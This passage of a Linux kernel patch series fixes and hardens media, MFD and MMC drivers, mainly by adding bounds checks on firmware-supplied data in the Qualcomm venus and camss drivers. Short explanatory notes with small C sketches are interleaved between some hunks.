+diff --git a/drivers/media/platform/qcom/camss/camss-vfe.c b/drivers/media/platform/qcom/camss/camss-vfe.c
+index d8cd9b09c20de..ee4d7dccefe16 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe.c
+@@ -535,7 +535,8 @@ static int vfe_check_clock_rates(struct vfe_device *vfe)
+ 		struct camss_clock *clock = &vfe->clock[i];
+ 
+ 		if (!strcmp(clock->name, "vfe0") ||
+-		    !strcmp(clock->name, "vfe1")) {
++		    !strcmp(clock->name, "vfe1") ||
++		    !strcmp(clock->name, "vfe_lite")) {
+ 			u64 min_rate = 0;
+ 			unsigned long rate;
+ 
+@@ -611,7 +612,7 @@ int vfe_get(struct vfe_device *vfe)
+ 	} else {
+ 		ret = vfe_check_clock_rates(vfe);
+ 		if (ret < 0)
+-			goto error_pm_runtime_get;
++			goto error_pm_domain;
+ 	}
+ 	vfe->power_count++;
+ 
+diff --git a/drivers/media/platform/qcom/camss/camss.c b/drivers/media/platform/qcom/camss/camss.c
+index a157cac72e0ab..5057b2c4cf6c4 100644
+--- a/drivers/media/platform/qcom/camss/camss.c
++++ b/drivers/media/platform/qcom/camss/camss.c
+@@ -1624,6 +1624,12 @@ static int camss_probe(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		goto err_cleanup;
+ 
++	ret = camss_configure_pd(camss);
++	if (ret < 0) {
++		dev_err(dev, "Failed to configure power domains: %d\n", ret);
++		goto err_cleanup;
++	}
++
+ 	ret = camss_init_subdevices(camss);
+ 	if (ret < 0)
+ 		goto err_cleanup;
+@@ -1676,12 +1682,6 @@ static int camss_probe(struct platform_device *pdev)
+ 		}
+ 	}
+ 
+-	ret = camss_configure_pd(camss);
+-	if (ret < 0) {
+-		dev_err(dev, "Failed to configure power domains: %d\n", ret);
+-		return ret;
+-	}
+-
+ 	pm_runtime_enable(dev);
+ 
+ 	return 0;
+diff --git a/drivers/media/platform/qcom/venus/hfi_msgs.c b/drivers/media/platform/qcom/venus/hfi_msgs.c
+index df96db3761a72..1c5cc5a5f89a6 100644
+--- a/drivers/media/platform/qcom/venus/hfi_msgs.c
++++ b/drivers/media/platform/qcom/venus/hfi_msgs.c
+@@ -374,7 +374,7 @@ session_get_prop_buf_req(struct hfi_msg_session_property_info_pkt *pkt,
+ 		memcpy(&bufreq[idx], buf_req, sizeof(*bufreq));
+ 		idx++;
+ 
+-		if (idx > HFI_BUFFER_TYPE_MAX)
++		if (idx >= HFI_BUFFER_TYPE_MAX)
+ 			return HFI_ERR_SESSION_INVALID_PARAMETER;
+ 
+ 		req_bytes -= sizeof(struct hfi_buffer_requirements);
+diff --git a/drivers/media/platform/qcom/venus/hfi_parser.c b/drivers/media/platform/qcom/venus/hfi_parser.c
+index 6cf74b2bc5ae3..c43839539d4dd 100644
+--- a/drivers/media/platform/qcom/venus/hfi_parser.c
++++ b/drivers/media/platform/qcom/venus/hfi_parser.c
+@@ -19,6 +19,9 @@ static void init_codecs(struct venus_core *core)
+ 	struct hfi_plat_caps *caps = core->caps, *cap;
+ 	unsigned long bit;
+ 
++	if (hweight_long(core->dec_codecs) + hweight_long(core->enc_codecs) > MAX_CODEC_NUM)
++		return;
++
+ 	for_each_set_bit(bit, &core->dec_codecs, MAX_CODEC_NUM) {
+ 		cap = &caps[core->codecs_count++];
+ 		cap->codec = BIT(bit);
+@@ -86,6 +89,9 @@ static void fill_profile_level(struct hfi_plat_caps *cap, const void *data,
+ {
+ 	const struct hfi_profile_level *pl = data;
+ 
++	if (cap->num_pl + num >= HFI_MAX_PROFILE_COUNT)
++		return;
++
+ 	memcpy(&cap->pl[cap->num_pl], pl, num * sizeof(*pl));
+ 	cap->num_pl += num;
+ }
+@@ -111,6 +117,9 @@ fill_caps(struct hfi_plat_caps *cap, const void *data, unsigned int num)
+ {
+ 	const struct hfi_capability *caps = data;
+ 
++	if (cap->num_caps + num >= MAX_CAP_ENTRIES)
++		return;
++
+ 	memcpy(&cap->caps[cap->num_caps], caps, num * sizeof(*caps));
+ 	cap->num_caps += num;
+ }
+@@ -137,6 +146,9 @@ static void fill_raw_fmts(struct hfi_plat_caps *cap, const void *fmts,
+ {
+ 	const struct raw_formats *formats = fmts;
+ 
++	if (cap->num_fmts + num_fmts >= MAX_FMT_ENTRIES)
++		return;
++
+ 	memcpy(&cap->fmts[cap->num_fmts], formats, num_fmts * sizeof(*formats));
+ 	cap->num_fmts += num_fmts;
+ }
+@@ -159,6 +171,9 @@ parse_raw_formats(struct venus_core *core, u32 codecs, u32 domain, void *data)
+ 		rawfmts[i].buftype = fmt->buffer_type;
+ 		i++;
+ 
++		if (i >= MAX_FMT_ENTRIES)
++			return;
++
+ 		if (pinfo->num_planes > MAX_PLANES)
+ 			break;
+ 
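The hfi_parser hunks all add the same guard: counts arriving in firmware messages are checked against the fixed capability-array sizes before memcpy(), so an oversized payload is dropped rather than overflowing the arrays. The recurring shape, with hypothetical names:

    /* num comes from untrusted firmware data; MAX_ENTRIES bounds the
     * fixed array embedded in struct my_caps. */
    static void fill_entries(struct my_caps *cap, const void *data,
                             unsigned int num)
    {
        if (cap->num + num >= MAX_ENTRIES)
            return;   /* reject the payload instead of overflowing */

        memcpy(&cap->entries[cap->num], data, num * sizeof(cap->entries[0]));
        cap->num += num;
    }
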
+diff --git a/drivers/media/platform/qcom/venus/hfi_venus.c b/drivers/media/platform/qcom/venus/hfi_venus.c
+index 8fc8f46dc3908..d46938aab26b7 100644
+--- a/drivers/media/platform/qcom/venus/hfi_venus.c
++++ b/drivers/media/platform/qcom/venus/hfi_venus.c
+@@ -205,6 +205,11 @@ static int venus_write_queue(struct venus_hfi_device *hdev,
+ 
+ 	new_wr_idx = wr_idx + dwords;
+ 	wr_ptr = (u32 *)(queue->qmem.kva + (wr_idx << 2));
++
++	if (wr_ptr < (u32 *)queue->qmem.kva ||
++	    wr_ptr > (u32 *)(queue->qmem.kva + queue->qmem.size - sizeof(*wr_ptr)))
++		return -EINVAL;
++
+ 	if (new_wr_idx < qsize) {
+ 		memcpy(wr_ptr, packet, dwords << 2);
+ 	} else {
+@@ -272,6 +277,11 @@ static int venus_read_queue(struct venus_hfi_device *hdev,
+ 	}
+ 
+ 	rd_ptr = (u32 *)(queue->qmem.kva + (rd_idx << 2));
++
++	if (rd_ptr < (u32 *)queue->qmem.kva ||
++	    rd_ptr > (u32 *)(queue->qmem.kva + queue->qmem.size - sizeof(*rd_ptr)))
++		return -EINVAL;
++
+ 	dwords = *rd_ptr >> 2;
+ 	if (!dwords)
+ 		return -EINVAL;
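
Both queue hunks validate a pointer computed from a firmware-controlled index before it is dereferenced: the slot must lie entirely within the queue's backing memory. A userspace sketch of the range check (names are illustrative):

#include <stdint.h>
#include <stddef.h>

static int validate_slot(const void *base, size_t size, const uint32_t *ptr)
{
        const uint32_t *start = base;
        const uint32_t *end =
                (const uint32_t *)((const char *)base + size - sizeof(*ptr));

        /* the whole u32 must fit inside [base, base + size) */
        if (ptr < start || ptr > end)
                return -1;
        return 0;
}

int main(void)
{
        uint32_t q[8];

        return validate_slot(q, sizeof(q), &q[7]) ||    /* ok: last slot */
               !validate_slot(q, sizeof(q), &q[8]);     /* out of range */
}
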
+diff --git a/drivers/media/rc/imon.c b/drivers/media/rc/imon.c
+index 74546f7e34691..5719dda6e0f0e 100644
+--- a/drivers/media/rc/imon.c
++++ b/drivers/media/rc/imon.c
+@@ -2427,6 +2427,12 @@ static int imon_probe(struct usb_interface *interface,
+ 		goto fail;
+ 	}
+ 
++	if (first_if->dev.driver != interface->dev.driver) {
++		dev_err(&interface->dev, "inconsistent driver matching\n");
++		ret = -EINVAL;
++		goto fail;
++	}
++
+ 	if (ifnum == 0) {
+ 		ictx = imon_init_intf0(interface, id);
+ 		if (!ictx) {
+diff --git a/drivers/media/rc/ir-sharp-decoder.c b/drivers/media/rc/ir-sharp-decoder.c
+index 3d8488c39c561..3311099cbd573 100644
+--- a/drivers/media/rc/ir-sharp-decoder.c
++++ b/drivers/media/rc/ir-sharp-decoder.c
+@@ -15,7 +15,9 @@
+ #define SHARP_UNIT		40  /* us */
+ #define SHARP_BIT_PULSE		(8    * SHARP_UNIT) /* 320us */
+ #define SHARP_BIT_0_PERIOD	(25   * SHARP_UNIT) /* 1ms (680us space) */
+-#define SHARP_BIT_1_PERIOD	(50   * SHARP_UNIT) /* 2ms (1680ms space) */
++#define SHARP_BIT_1_PERIOD	(50   * SHARP_UNIT) /* 2ms (1680us space) */
++#define SHARP_BIT_0_SPACE	(17   * SHARP_UNIT) /* 680us space */
++#define SHARP_BIT_1_SPACE	(42   * SHARP_UNIT) /* 1680us space */
+ #define SHARP_ECHO_SPACE	(1000 * SHARP_UNIT) /* 40 ms */
+ #define SHARP_TRAILER_SPACE	(125  * SHARP_UNIT) /* 5 ms (even longer) */
+ 
+@@ -168,8 +170,8 @@ static const struct ir_raw_timings_pd ir_sharp_timings = {
+ 	.header_pulse  = 0,
+ 	.header_space  = 0,
+ 	.bit_pulse     = SHARP_BIT_PULSE,
+-	.bit_space[0]  = SHARP_BIT_0_PERIOD,
+-	.bit_space[1]  = SHARP_BIT_1_PERIOD,
++	.bit_space[0]  = SHARP_BIT_0_SPACE,
++	.bit_space[1]  = SHARP_BIT_1_SPACE,
+ 	.trailer_pulse = SHARP_BIT_PULSE,
+ 	.trailer_space = SHARP_ECHO_SPACE,
+ 	.msb_first     = 1,
+diff --git a/drivers/media/rc/lirc_dev.c b/drivers/media/rc/lirc_dev.c
+index 25ab61dae126d..184e0b35744f3 100644
+--- a/drivers/media/rc/lirc_dev.c
++++ b/drivers/media/rc/lirc_dev.c
+@@ -276,7 +276,11 @@ static ssize_t lirc_transmit(struct file *file, const char __user *buf,
+ 		if (ret < 0)
+ 			goto out_kfree_raw;
+ 
+-		count = ret;
++		/* drop trailing space */
++		if (!(ret % 2))
++			count = ret - 1;
++		else
++			count = ret;
+ 
+ 		txbuf = kmalloc_array(count, sizeof(unsigned int), GFP_KERNEL);
+ 		if (!txbuf) {
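
Raw IR samples alternate pulse/space, and a transmission must both start and end with a pulse, so an even sample count means the last entry is a dangling space that some hardware refuses to send. A tiny sketch of the trim (assumes at least one sample, which the driver has already checked at this point):

#include <assert.h>

static unsigned int usable_samples(unsigned int n)      /* n >= 1 */
{
        return (n % 2 == 0) ? n - 1 : n;        /* even count ends in a space */
}

int main(void)
{
        assert(usable_samples(6) == 5);
        assert(usable_samples(5) == 5);
        return 0;
}
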
+diff --git a/drivers/media/test-drivers/vivid/vivid-rds-gen.c b/drivers/media/test-drivers/vivid/vivid-rds-gen.c
+index b5b104ee64c99..c57771119a34b 100644
+--- a/drivers/media/test-drivers/vivid/vivid-rds-gen.c
++++ b/drivers/media/test-drivers/vivid/vivid-rds-gen.c
+@@ -145,7 +145,7 @@ void vivid_rds_gen_fill(struct vivid_rds_gen *rds, unsigned freq,
+ 	rds->ta = alt;
+ 	rds->ms = true;
+ 	snprintf(rds->psname, sizeof(rds->psname), "%6d.%1d",
+-		 freq / 16, ((freq & 0xf) * 10) / 16);
++		 (freq / 16) % 1000000, (((freq & 0xf) * 10) / 16) % 10);
+ 	if (alt)
+ 		strscpy(rds->radiotext,
+ 			" The Radio Data System can switch between different Radio Texts ",
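
The reworked snprintf() above clamps both operands so "%6d.%1d" can never expand past the 8 visible characters an RDS PS name holds, which also silences format-truncation warnings. The same computation in standalone form (the 9-byte buffer is the 8 characters plus the NUL):

#include <stdio.h>

static void fill_psname(char out[9], unsigned int freq)
{
        /* (freq / 16) % 1000000 fits "%6d", the fraction fits "%1d" */
        snprintf(out, 9, "%6d.%1d",
                 (freq / 16) % 1000000, (((freq & 0xf) * 10) / 16) % 10);
}

int main(void)
{
        char ps[9];

        fill_psname(ps, 0xffffffff);
        printf("'%s'\n", ps);   /* always exactly 8 visible chars */
        return 0;
}
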
+diff --git a/drivers/media/usb/gspca/cpia1.c b/drivers/media/usb/gspca/cpia1.c
+index 46ed95483e222..5f5fa851ca640 100644
+--- a/drivers/media/usb/gspca/cpia1.c
++++ b/drivers/media/usb/gspca/cpia1.c
+@@ -18,6 +18,7 @@
+ 
+ #include <linux/input.h>
+ #include <linux/sched/signal.h>
++#include <linux/bitops.h>
+ 
+ #include "gspca.h"
+ 
+@@ -1028,6 +1029,8 @@ static int set_flicker(struct gspca_dev *gspca_dev, int on, int apply)
+ 			sd->params.exposure.expMode = 2;
+ 			sd->exposure_status = EXPOSURE_NORMAL;
+ 		}
++		if (sd->params.exposure.gain >= BITS_PER_TYPE(currentexp))
++			return -EINVAL;
+ 		currentexp = currentexp << sd->params.exposure.gain;
+ 		sd->params.exposure.gain = 0;
+ 		/* round down current exposure to nearest value */
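
The new check guards a shift by an untrusted exponent: shifting a value by its full bit width or more is undefined behaviour in C, so the gain must be range-checked first. A userspace equivalent of the guard, with BITS_PER_TYPE() spelled out and EINVAL taken from errno.h:

#include <limits.h>
#include <errno.h>

#define BITS_PER_TYPE(t)        (sizeof(t) * CHAR_BIT)

static int scale_exposure(unsigned int *exp, unsigned int gain)
{
        if (gain >= BITS_PER_TYPE(*exp))        /* would be UB */
                return -EINVAL;
        *exp <<= gain;
        return 0;
}

int main(void)
{
        unsigned int exp = 1;

        return scale_exposure(&exp, 40) == -EINVAL ? 0 : 1;
}
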
+diff --git a/drivers/mfd/intel-lpss-pci.c b/drivers/mfd/intel-lpss-pci.c
+index 699f44ffff0e4..ae5759200622c 100644
+--- a/drivers/mfd/intel-lpss-pci.c
++++ b/drivers/mfd/intel-lpss-pci.c
+@@ -561,6 +561,19 @@ static const struct pci_device_id intel_lpss_pci_ids[] = {
+ 	{ PCI_VDEVICE(INTEL, 0xa3e2), (kernel_ulong_t)&spt_i2c_info },
+ 	{ PCI_VDEVICE(INTEL, 0xa3e3), (kernel_ulong_t)&spt_i2c_info },
+ 	{ PCI_VDEVICE(INTEL, 0xa3e6), (kernel_ulong_t)&spt_uart_info },
++	/* LNL-M */
++	{ PCI_VDEVICE(INTEL, 0xa825), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0xa826), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0xa827), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0xa830), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0xa846), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0xa850), (kernel_ulong_t)&ehl_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0xa851), (kernel_ulong_t)&ehl_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0xa852), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0xa878), (kernel_ulong_t)&ehl_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0xa879), (kernel_ulong_t)&ehl_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0xa87a), (kernel_ulong_t)&ehl_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0xa87b), (kernel_ulong_t)&ehl_i2c_info },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(pci, intel_lpss_pci_ids);
+diff --git a/drivers/mfd/qcom-spmi-pmic.c b/drivers/mfd/qcom-spmi-pmic.c
+index 7e2cd79d17ebf..8e449cff5cec4 100644
+--- a/drivers/mfd/qcom-spmi-pmic.c
++++ b/drivers/mfd/qcom-spmi-pmic.c
+@@ -30,6 +30,8 @@ struct qcom_spmi_dev {
+ 	struct qcom_spmi_pmic pmic;
+ };
+ 
++static DEFINE_MUTEX(pmic_spmi_revid_lock);
++
+ #define N_USIDS(n)		((void *)n)
+ 
+ static const struct of_device_id pmic_spmi_id_table[] = {
+@@ -76,24 +78,21 @@ static const struct of_device_id pmic_spmi_id_table[] = {
+  *
+  * This only supports PMICs with 1 or 2 USIDs.
+  */
+-static struct spmi_device *qcom_pmic_get_base_usid(struct device *dev)
++static struct spmi_device *qcom_pmic_get_base_usid(struct spmi_device *sdev, struct qcom_spmi_dev *ctx)
+ {
+-	struct spmi_device *sdev;
+-	struct qcom_spmi_dev *ctx;
+ 	struct device_node *spmi_bus;
+-	struct device_node *other_usid = NULL;
++	struct device_node *child;
+ 	int function_parent_usid, ret;
+ 	u32 pmic_addr;
+ 
+-	sdev = to_spmi_device(dev);
+-	ctx = dev_get_drvdata(&sdev->dev);
+-
+ 	/*
+ 	 * Quick return if the function device is already in the base
+ 	 * USID. This will always be hit for PMICs with only 1 USID.
+ 	 */
+-	if (sdev->usid % ctx->num_usids == 0)
++	if (sdev->usid % ctx->num_usids == 0) {
++		get_device(&sdev->dev);
+ 		return sdev;
++	}
+ 
+ 	function_parent_usid = sdev->usid;
+ 
+@@ -105,28 +104,61 @@ static struct spmi_device *qcom_pmic_get_base_usid(struct device *dev)
+ 	 * device for USID 2.
+ 	 */
+ 	spmi_bus = of_get_parent(sdev->dev.of_node);
+-	do {
+-		other_usid = of_get_next_child(spmi_bus, other_usid);
+-
+-		ret = of_property_read_u32_index(other_usid, "reg", 0, &pmic_addr);
+-		if (ret)
+-			return ERR_PTR(ret);
++	sdev = ERR_PTR(-ENODATA);
++	for_each_child_of_node(spmi_bus, child) {
++		ret = of_property_read_u32_index(child, "reg", 0, &pmic_addr);
++		if (ret) {
++			of_node_put(child);
++			sdev = ERR_PTR(ret);
++			break;
++		}
+ 
+-		sdev = spmi_device_from_of(other_usid);
+ 		if (pmic_addr == function_parent_usid - (ctx->num_usids - 1)) {
+-			if (!sdev)
++			sdev = spmi_device_from_of(child);
++			if (!sdev) {
+ 				/*
+-				 * If the base USID for this PMIC hasn't probed yet
+-				 * but the secondary USID has, then we need to defer
+-				 * the function driver so that it will attempt to
+-				 * probe again when the base USID is ready.
++				 * If the base USID for this PMIC hasn't been
++				 * registered yet then we need to defer.
+ 				 */
+-				return ERR_PTR(-EPROBE_DEFER);
+-			return sdev;
++				sdev = ERR_PTR(-EPROBE_DEFER);
++			}
++			of_node_put(child);
++			break;
+ 		}
+-	} while (other_usid->sibling);
++	}
+ 
+-	return ERR_PTR(-ENODATA);
++	of_node_put(spmi_bus);
++
++	return sdev;
++}
++
++static int pmic_spmi_get_base_revid(struct spmi_device *sdev, struct qcom_spmi_dev *ctx)
++{
++	struct qcom_spmi_dev *base_ctx;
++	struct spmi_device *base;
++	int ret = 0;
++
++	base = qcom_pmic_get_base_usid(sdev, ctx);
++	if (IS_ERR(base))
++		return PTR_ERR(base);
++
++	/*
++	 * Copy revid info from base device if it has probed and is still
++	 * bound to its driver.
++	 */
++	mutex_lock(&pmic_spmi_revid_lock);
++	base_ctx = spmi_device_get_drvdata(base);
++	if (!base_ctx) {
++		ret = -EPROBE_DEFER;
++		goto out_unlock;
++	}
++	memcpy(&ctx->pmic, &base_ctx->pmic, sizeof(ctx->pmic));
++out_unlock:
++	mutex_unlock(&pmic_spmi_revid_lock);
++
++	put_device(&base->dev);
++
++	return ret;
+ }
+ 
+ static int pmic_spmi_load_revid(struct regmap *map, struct device *dev,
+@@ -204,11 +236,7 @@ const struct qcom_spmi_pmic *qcom_pmic_get(struct device *dev)
+ 	if (!of_match_device(pmic_spmi_id_table, dev->parent))
+ 		return ERR_PTR(-EINVAL);
+ 
+-	sdev = qcom_pmic_get_base_usid(dev->parent);
+-
+-	if (IS_ERR(sdev))
+-		return ERR_CAST(sdev);
+-
++	sdev = to_spmi_device(dev->parent);
+ 	spmi = dev_get_drvdata(&sdev->dev);
+ 
+ 	return &spmi->pmic;
+@@ -243,16 +271,31 @@ static int pmic_spmi_probe(struct spmi_device *sdev)
+ 		ret = pmic_spmi_load_revid(regmap, &sdev->dev, &ctx->pmic);
+ 		if (ret < 0)
+ 			return ret;
++	} else {
++		ret = pmic_spmi_get_base_revid(sdev, ctx);
++		if (ret)
++			return ret;
+ 	}
++
++	mutex_lock(&pmic_spmi_revid_lock);
+ 	spmi_device_set_drvdata(sdev, ctx);
++	mutex_unlock(&pmic_spmi_revid_lock);
+ 
+ 	return devm_of_platform_populate(&sdev->dev);
+ }
+ 
++static void pmic_spmi_remove(struct spmi_device *sdev)
++{
++	mutex_lock(&pmic_spmi_revid_lock);
++	spmi_device_set_drvdata(sdev, NULL);
++	mutex_unlock(&pmic_spmi_revid_lock);
++}
++
+ MODULE_DEVICE_TABLE(of, pmic_spmi_id_table);
+ 
+ static struct spmi_driver pmic_spmi_driver = {
+ 	.probe = pmic_spmi_probe,
++	.remove = pmic_spmi_remove,
+ 	.driver = {
+ 		.name = "pmic-spmi",
+ 		.of_match_table = pmic_spmi_id_table,
+diff --git a/drivers/misc/pci_endpoint_test.c b/drivers/misc/pci_endpoint_test.c
+index 55dc16d8f6adb..18059a12d4e18 100644
+--- a/drivers/misc/pci_endpoint_test.c
++++ b/drivers/misc/pci_endpoint_test.c
+@@ -81,6 +81,7 @@
+ #define PCI_DEVICE_ID_RENESAS_R8A774B1		0x002b
+ #define PCI_DEVICE_ID_RENESAS_R8A774C0		0x002d
+ #define PCI_DEVICE_ID_RENESAS_R8A774E1		0x0025
++#define PCI_DEVICE_ID_RENESAS_R8A779F0		0x0031
+ 
+ static DEFINE_IDA(pci_endpoint_test_ida);
+ 
+@@ -996,6 +997,9 @@ static const struct pci_device_id pci_endpoint_test_tbl[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_RENESAS, PCI_DEVICE_ID_RENESAS_R8A774B1),},
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_RENESAS, PCI_DEVICE_ID_RENESAS_R8A774C0),},
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_RENESAS, PCI_DEVICE_ID_RENESAS_R8A774E1),},
++	{ PCI_DEVICE(PCI_VENDOR_ID_RENESAS, PCI_DEVICE_ID_RENESAS_R8A779F0),
++	  .driver_data = (kernel_ulong_t)&default_data,
++	},
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_TI, PCI_DEVICE_ID_TI_J721E),
+ 	  .driver_data = (kernel_ulong_t)&j721e_data,
+ 	},
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index 1fc6767f18782..67a7ae9b997aa 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -2404,8 +2404,10 @@ enum mmc_issued mmc_blk_mq_issue_rq(struct mmc_queue *mq, struct request *req)
+ 			}
+ 			ret = mmc_blk_cqe_issue_flush(mq, req);
+ 			break;
+-		case REQ_OP_READ:
+ 		case REQ_OP_WRITE:
++			card->written_flag = true;
++			fallthrough;
++		case REQ_OP_READ:
+ 			if (host->cqe_enabled)
+ 				ret = mmc_blk_cqe_issue_rw_rq(mq, req);
+ 			else
+diff --git a/drivers/mmc/core/card.h b/drivers/mmc/core/card.h
+index 4edf9057fa79d..b7754a1b8d978 100644
+--- a/drivers/mmc/core/card.h
++++ b/drivers/mmc/core/card.h
+@@ -280,4 +280,8 @@ static inline int mmc_card_broken_sd_cache(const struct mmc_card *c)
+ 	return c->quirks & MMC_QUIRK_BROKEN_SD_CACHE;
+ }
+ 
++static inline int mmc_card_broken_cache_flush(const struct mmc_card *c)
++{
++	return c->quirks & MMC_QUIRK_BROKEN_CACHE_FLUSH;
++}
+ #endif
+diff --git a/drivers/mmc/core/mmc.c b/drivers/mmc/core/mmc.c
+index 89cd48fcec79f..a46ce0868fe1f 100644
+--- a/drivers/mmc/core/mmc.c
++++ b/drivers/mmc/core/mmc.c
+@@ -2081,13 +2081,17 @@ static int _mmc_flush_cache(struct mmc_host *host)
+ {
+ 	int err = 0;
+ 
++	if (mmc_card_broken_cache_flush(host->card) && !host->card->written_flag)
++		return 0;
++
+ 	if (_mmc_cache_enabled(host)) {
+ 		err = mmc_switch(host->card, EXT_CSD_CMD_SET_NORMAL,
+ 				 EXT_CSD_FLUSH_CACHE, 1,
+ 				 CACHE_FLUSH_TIMEOUT_MS);
+ 		if (err)
+-			pr_err("%s: cache flush error %d\n",
+-			       mmc_hostname(host), err);
++			pr_err("%s: cache flush error %d\n", mmc_hostname(host), err);
++		else
++			host->card->written_flag = false;
+ 	}
+ 
+ 	return err;
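
Together with the block-layer hunk that sets card->written_flag on REQ_OP_WRITE, this implements a dirty flag: for the quirky eMMC the cache is flushed only once a write has actually dirtied it, and the flag is cleared again on a successful flush. A simplified sketch of that gating (flush_hw() stands in for the real CMD6 switch, and the quirk test is folded away):

#include <stdbool.h>

struct card {
        bool written;   /* set on every write, cleared on flush */
};

static int flush_cache(struct card *c, int (*flush_hw)(void))
{
        int err;

        if (!c->written)        /* nothing dirtied the cache: skip */
                return 0;

        err = flush_hw();
        if (!err)
                c->written = false;
        return err;
}
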
+diff --git a/drivers/mmc/core/quirks.h b/drivers/mmc/core/quirks.h
+index 857315f185fcf..ec760ac0b3977 100644
+--- a/drivers/mmc/core/quirks.h
++++ b/drivers/mmc/core/quirks.h
+@@ -117,11 +117,12 @@ static const struct mmc_fixup __maybe_unused mmc_blk_fixups[] = {
+ 		  MMC_QUIRK_TRIM_BROKEN),
+ 
+ 	/*
+-	 * Micron MTFC4GACAJCN-1M advertises TRIM but it does not seems to
+-	 * support being used to offload WRITE_ZEROES.
++	 * Micron MTFC4GACAJCN-1M supports TRIM but does not appear to support
++	 * WRITE_ZEROES offloading. It also supports caching, but the cache can
++	 * only be flushed after a write has occurred.
+ 	 */
+ 	MMC_FIXUP("Q2J54A", CID_MANFID_MICRON, 0x014e, add_quirk_mmc,
+-		  MMC_QUIRK_TRIM_BROKEN),
++		  MMC_QUIRK_TRIM_BROKEN | MMC_QUIRK_BROKEN_CACHE_FLUSH),
+ 
+ 	/*
+ 	 * Some SD cards reports discard support while they don't
+diff --git a/drivers/mmc/host/meson-gx-mmc.c b/drivers/mmc/host/meson-gx-mmc.c
+index 0f39f86bd0c26..7e571cc719605 100644
+--- a/drivers/mmc/host/meson-gx-mmc.c
++++ b/drivers/mmc/host/meson-gx-mmc.c
+@@ -817,7 +817,6 @@ static void meson_mmc_start_cmd(struct mmc_host *mmc, struct mmc_command *cmd)
+ 
+ 	cmd_cfg |= FIELD_PREP(CMD_CFG_CMD_INDEX_MASK, cmd->opcode);
+ 	cmd_cfg |= CMD_CFG_OWNER;  /* owned by CPU */
+-	cmd_cfg |= CMD_CFG_ERROR; /* stop in case of error */
+ 
+ 	meson_mmc_set_response_bits(cmd, &cmd_cfg);
+ 
+diff --git a/drivers/mmc/host/sdhci-pci-gli.c b/drivers/mmc/host/sdhci-pci-gli.c
+index c580ba089a261..33d7039c19169 100644
+--- a/drivers/mmc/host/sdhci-pci-gli.c
++++ b/drivers/mmc/host/sdhci-pci-gli.c
+@@ -24,6 +24,12 @@
+ #define   GLI_9750_WT_EN_ON	    0x1
+ #define   GLI_9750_WT_EN_OFF	    0x0
+ 
++#define PCI_GLI_9750_PM_CTRL	0xFC
++#define   PCI_GLI_9750_PM_STATE	  GENMASK(1, 0)
++
++#define PCI_GLI_9750_CORRERR_MASK				0x214
++#define   PCI_GLI_9750_CORRERR_MASK_REPLAY_TIMER_TIMEOUT	  BIT(12)
++
+ #define SDHCI_GLI_9750_CFG2          0x848
+ #define   SDHCI_GLI_9750_CFG2_L1DLY    GENMASK(28, 24)
+ #define   GLI_9750_CFG2_L1DLY_VALUE    0x1F
+@@ -148,6 +154,9 @@
+ #define PCI_GLI_9755_PM_CTRL     0xFC
+ #define   PCI_GLI_9755_PM_STATE    GENMASK(1, 0)
+ 
++#define PCI_GLI_9755_CORRERR_MASK				0x214
++#define   PCI_GLI_9755_CORRERR_MASK_REPLAY_TIMER_TIMEOUT	  BIT(12)
++
+ #define GLI_MAX_TUNING_LOOP 40
+ 
+ /* Genesys Logic chipset */
+@@ -469,8 +478,12 @@ static void sdhci_gl9750_set_clock(struct sdhci_host *host, unsigned int clock)
+ 
+ static void gl9750_hw_setting(struct sdhci_host *host)
+ {
++	struct sdhci_pci_slot *slot = sdhci_priv(host);
++	struct pci_dev *pdev;
+ 	u32 value;
+ 
++	pdev = slot->chip->pdev;
++
+ 	gl9750_wt_on(host);
+ 
+ 	value = sdhci_readl(host, SDHCI_GLI_9750_CFG2);
+@@ -480,6 +493,18 @@ static void gl9750_hw_setting(struct sdhci_host *host)
+ 			    GLI_9750_CFG2_L1DLY_VALUE);
+ 	sdhci_writel(host, value, SDHCI_GLI_9750_CFG2);
+ 
++	/* toggle PM state to allow GL9750 to enter ASPM L1.2 */
++	pci_read_config_dword(pdev, PCI_GLI_9750_PM_CTRL, &value);
++	value |= PCI_GLI_9750_PM_STATE;
++	pci_write_config_dword(pdev, PCI_GLI_9750_PM_CTRL, value);
++	value &= ~PCI_GLI_9750_PM_STATE;
++	pci_write_config_dword(pdev, PCI_GLI_9750_PM_CTRL, value);
++
++	/* mask the replay timer timeout of AER */
++	pci_read_config_dword(pdev, PCI_GLI_9750_CORRERR_MASK, &value);
++	value |= PCI_GLI_9750_CORRERR_MASK_REPLAY_TIMER_TIMEOUT;
++	pci_write_config_dword(pdev, PCI_GLI_9750_CORRERR_MASK, value);
++
+ 	gl9750_wt_off(host);
+ }
+ 
+@@ -689,6 +714,11 @@ static void gl9755_hw_setting(struct sdhci_pci_slot *slot)
+ 	value &= ~PCI_GLI_9755_PM_STATE;
+ 	pci_write_config_dword(pdev, PCI_GLI_9755_PM_CTRL, value);
+ 
++	/* mask the replay timer timeout of AER */
++	pci_read_config_dword(pdev, PCI_GLI_9755_CORRERR_MASK, &value);
++	value |= PCI_GLI_9755_CORRERR_MASK_REPLAY_TIMER_TIMEOUT;
++	pci_write_config_dword(pdev, PCI_GLI_9755_CORRERR_MASK, value);
++
+ 	gl9755_wt_off(pdev);
+ }
+ 
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
